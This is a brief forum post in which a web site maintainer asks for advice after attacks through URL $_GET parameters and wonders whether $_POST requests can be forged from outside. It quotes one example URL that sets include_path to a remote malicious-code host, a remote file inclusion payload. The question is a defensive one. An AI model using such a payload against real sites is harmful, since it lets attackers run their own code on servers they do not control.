I have had attacks on a web site that I maintain through the inclusion of malicious code in the $_GET portions of URL's.
I was wondering how easy it is for hackers to simulate an internal $_POST from outside my site. I haven't noticed any trouble with that, but if I were a hacker, that's what I would try.
Any suggestions/warnings?
Code:
For example: http://mysite.com?include_path=http://maliciouscode.location.com
Any suggestions/warnings?
Comment